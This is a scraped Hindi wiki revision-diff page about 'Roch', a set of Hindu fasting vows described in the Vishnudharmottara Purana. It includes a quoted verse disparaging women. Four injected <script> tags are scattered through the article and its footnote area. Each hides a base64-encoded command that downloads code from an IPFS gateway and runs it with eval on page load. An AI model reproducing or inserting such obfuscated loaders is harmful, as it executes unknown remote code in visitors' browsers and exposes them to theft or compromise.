Difference between revisions of "रोच"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह मासोपवास, ब्राह्मरोच, कालरोच ऐसे कतिपय व्रतों का नाम है। यह [[चैत्र]] [[शुक्ल पक्ष]] [[प्रतिपदा]] पर आरम्भ करना चाहिए।
 
*यह मासोपवास, ब्राह्मरोच, कालरोच ऐसे कतिपय व्रतों का नाम है। यह [[चैत्र]] [[शुक्ल पक्ष]] [[प्रतिपदा]] पर आरम्भ करना चाहिए।
*एक वर्ष तक करना चाहिए। विष्णुधर्मोत्तरपुराण <ref>विष्णुधर्मोत्तरपुराण (3|222-223)</ref> ने इसका विवरण दिया है।  
+
*एक वर्ष तक करना चाहिए। विष्णुधर्मोत्तरपुराण <ref>विष्णुधर्मोत्तरपुराण (3|222-223</ref> ने इसका विवरण दिया है।  
 
*अध्याय 224 में नारियों के चंचल स्वभाव का उल्लेख है।  
 
*अध्याय 224 में नारियों के चंचल स्वभाव का उल्लेख है।  
 
*किन्तु अन्त में निष्कर्ष है– 'नारियाँ पापों एवं विकारों की जड़ हैं तथा धर्म, अर्थ एवं काम की प्राप्ति के साधन भी हैं, उन पर विश्वास नहीं करना चाहिए, प्रत्युत रत्नों के समान उनकी रक्षा की जानी चाहिए।<ref>श्लोक, 25-26)।</ref>
 
*किन्तु अन्त में निष्कर्ष है– 'नारियाँ पापों एवं विकारों की जड़ हैं तथा धर्म, अर्थ एवं काम की प्राप्ति के साधन भी हैं, उन पर विश्वास नहीं करना चाहिए, प्रत्युत रत्नों के समान उनकी रक्षा की जानी चाहिए।<ref>श्लोक, 25-26)।</ref>

Latest revision as of 12:59, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah masopavas, brahmaroch, kalaroch aise katipay vratoan ka nam hai. yah chaitr shukl paksh pratipada par arambh karana chahie.
  • ek varsh tak karana chahie. vishnudharmottarapuran [1] ne isaka vivaran diya hai.
  • adhyay 224 mean nariyoan ke chanchal svabhav ka ullekh hai.
  • kintu ant mean nishkarsh hai– 'nariyaan papoan evan vikaroan ki j d haian tatha dharm, arth evan kam ki prapti ke sadhan bhi haian, un par vishvas nahian karana chahie, pratyut ratnoan ke saman unaki raksha ki jani chahie.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|222-223
  2. shlok, 25-26).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>